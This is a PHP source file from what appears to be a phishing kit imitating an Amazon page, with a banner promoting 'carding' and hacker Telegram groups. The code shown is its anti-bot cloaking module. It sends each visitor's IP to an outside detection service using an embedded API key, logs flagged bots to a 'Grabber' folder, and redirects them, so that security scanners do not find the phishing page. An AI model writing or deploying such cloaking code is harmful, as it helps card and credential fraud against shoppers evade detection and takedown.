<?php

/*
██████╗ ██╗  ██╗███████╗    ██████╗ ███████╗ ██████╗██╗  ██╗ █████╗ ██╗  ██╗     ██████╗ ██████╗ ██████╗ ███████╗██████╗ 
██╔══██╗██║  ██║██╔════╝    ██╔══██╗██╔════╝██╔════╝██║ ██╔╝██╔══██╗██║  ██║    ██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔══██╗
██║  ██║███████║█████╗      ██████╔╝█████╗  ██║     █████╔╝ ███████║███████║    ██║     ██║   ██║██║  ██║█████╗  ██║  ██║
██║  ██║██╔══██║██╔══╝      ██╔══██╗██╔══╝  ██║     ██╔═██╗ ██╔══██║██╔══██║    ██║     ██║   ██║██║  ██║██╔══╝  ██║  ██║
██████╔╝██║  ██║███████╗    ██║  ██║███████╗╚██████╗██║  ██╗██║  ██║██║  ██║    ╚██████╗╚██████╔╝██████╔╝███████╗██████╔╝
╚═════╝ ╚═╝  ╚═╝╚══════╝    ╚═╝  ╚═╝╚══════╝ ╚═════╝╚═╝  ╚═╝╚═╝  ╚═╝╚═╝  ╚═╝     ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═════╝ 
 * (🧑‍💻)=>DHE RECKAH BOY BORN DEM<=(🧑‍💻)
 * (🧑‍💻)=>OR THEY DON'T TELL YOU <=(🧑‍💻)
 * (🧑‍💻)=>COMMON CARDING FOR DATOR<=(🧑‍💻)
 * Dhe Reckah Amazon Page (MultiFunc)
 * version 1.0.0
 * REMEMBER:                             
 * Facebook fan page is @DheReckahBoy
 * Twitter  fan page is @DheReckahBoy
 * Insta    fan page is @DheReckahBoy
 * youtube  fan page is @DheReckahBoy
 * Telegram fan page is @DheReckahBoy
 * Copycat all reserved @DheReckahBoys
#############################################
#$            Dhe Reckah Coded             #$
#$                  Says:                  #$ 
We All Know The Dangers Of The Internet Users
#$                    &                    #$
#$           As the Internet Exit          #$ 
#$           The dangers exit too          #$  
#############################################
 ================IF AGREED=================
 ==================THEN====================
=Contact Coder On Telegram @DheReckahCoded
=To Be save Join Our Telegram Group
=   @Dhe_ReckahsHackers_Generation
=To Be Secured Join Our Telegram Channel
=   @Dhe_Reckahs_Hackers_Generation

*/


function botinho($native,$bot_protect){
    
    if($bot_protect == "on"){
        
        $DheReckahApi = "http://highwall.space/check/?ip=".$native."&fingerprint=on&ispinfo=isp&flags=b&api=SKecCwlsiuTDuIT8gZT";
        $curl       = curl_init();
        curl_setopt($curl, CURLOPT_URL, $DheReckahApi);
        curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
        $answer    = curl_exec($curl);
        curl_close($curl);
        $details  = json_decode($answer, true);

        $bad   = $details["badbot"];
        $org   = $details["org"];
        $botorigin   = $details["botcountry"];
        $ok   = $details["success"];

        if(strpos($bad, 'true') !== false){
            $message = ("Dh3 R3ck4h D3cl!n3d =>  [ Ultra Anti-bot ] :".$_SERVER['HTTP_USER_AGENT']."\n !p: ". $DheReckahApi." || D4t3:".gmdate ("d M,Y")." T!m3:".gmdate ("g:i a")."\n\n");
            $save=fopen("DheReckahGrabber/DiscoveredBot.txt","a+");
            fwrite($save,$message);
            fclose($save);
            return true;
        }else{
            return false;
        }
        
    }elseif($bot_protect == "off"){
        return false;
    }
    
    
}

$review = getenv("REMOTE_ADDR");
if(botinho($review,$bot_protect)){
    /* A bot has been detected based on your criteria
	 * and recorded
	 */
    header("Location: ".redirectBot());exit();
}

?>

